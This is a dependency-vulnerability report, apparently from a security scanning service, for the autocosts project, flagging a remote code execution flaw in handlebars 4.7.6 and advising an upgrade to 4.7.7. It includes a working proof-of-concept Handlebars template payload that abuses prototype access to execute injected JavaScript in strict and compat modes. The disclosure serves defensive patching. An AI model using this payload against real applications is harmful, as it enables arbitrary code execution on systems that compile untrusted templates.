jfoclpf/autocosts:package.json

Automobile Costs Calculator.

Vulnerabilities

1 via 1 paths

Dependencies

361

Source

GitHub

Commit

53e6a1dd

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity
new

Remote Code Execution (RCE)

  • Vulnerable module: handlebars
  • Introduced through: handlebars@4.7.6

Detailed paths

  • Introduced through: autocosts@jfoclpf/autocosts#53e6a1dd1bcff3b0ae39967224c8419fe3bcb39c handlebars@4.7.6
    Remediation: Upgrade to handlebars@4.7.7.

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;

var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`; var template = Handlebars.compile(s, { 
strict: true 
}); 
var template = Handlebars.compile(s2, { 
compat: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References